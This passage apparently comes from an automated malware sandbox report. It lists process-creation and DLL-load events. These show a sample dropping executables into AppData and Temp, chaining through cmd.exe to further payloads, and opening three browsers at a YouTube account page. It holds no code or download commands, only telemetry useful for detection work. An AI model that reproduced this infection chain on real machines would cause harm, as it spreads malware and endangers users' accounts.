Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: netutils.dll
